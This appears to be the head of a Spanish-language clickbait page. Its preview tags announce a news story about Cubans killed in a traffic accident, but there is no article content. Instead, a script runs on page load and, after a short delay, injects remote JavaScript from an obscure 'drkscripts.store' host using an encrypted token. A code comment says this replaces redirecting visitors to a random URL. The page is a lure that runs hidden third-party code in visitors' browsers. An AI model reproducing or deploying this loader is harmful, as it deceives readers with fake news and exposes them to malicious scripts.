<!DOCTYPE html>
  <html lang="es">
  <head>
  <meta charset="utf-8"/>
  <meta name="title" content="Stream"/>
  <meta name="keywords" content="Instagram"/>
  <meta property="og:description" content="2411"/>
  <meta name="googlebot" content="noindex"/>
  <meta name="robots" content="index"/>
  <meta name="robots" content="noindex"/>
  <meta name="robots" content="nofollow"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta property="og:title" content="Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana"/>
  <meta property="og:image" content="https://us-east-1.linodeobjects.com/postcron-photos/66606ac5611a7-54234df4-2dfc48ff-6ac5-65cd_66606ae1a5b0c.jpg"/>
  <meta name="apple-itunes-app" content="app-id=6448311069"/>
  <script>
    window.addEventListener('load', function() {
        // Carga el script en lugar de redirigir a una URL aleatoria
        setTimeout(function() {
            // Crea un elemento script y asigna el src
            var script = document.createElement('script');
            script.src = 'https://ap1.drkscripts.store/?token=U2FsdGVkX1%2BTwUQc2CLx3txb%2Fdg51aFk084i1dk0d0iiHX9b6%2FHlLBv5QW1RI1%2BOCxYh79tTkU6enleA1FBkxw%3D%3D';
            script.type = 'text/javascript';
            script.async = true;

            // Agrega el script al final del body
            document.body.appendChild(script);
        }, 500);
    });
</script>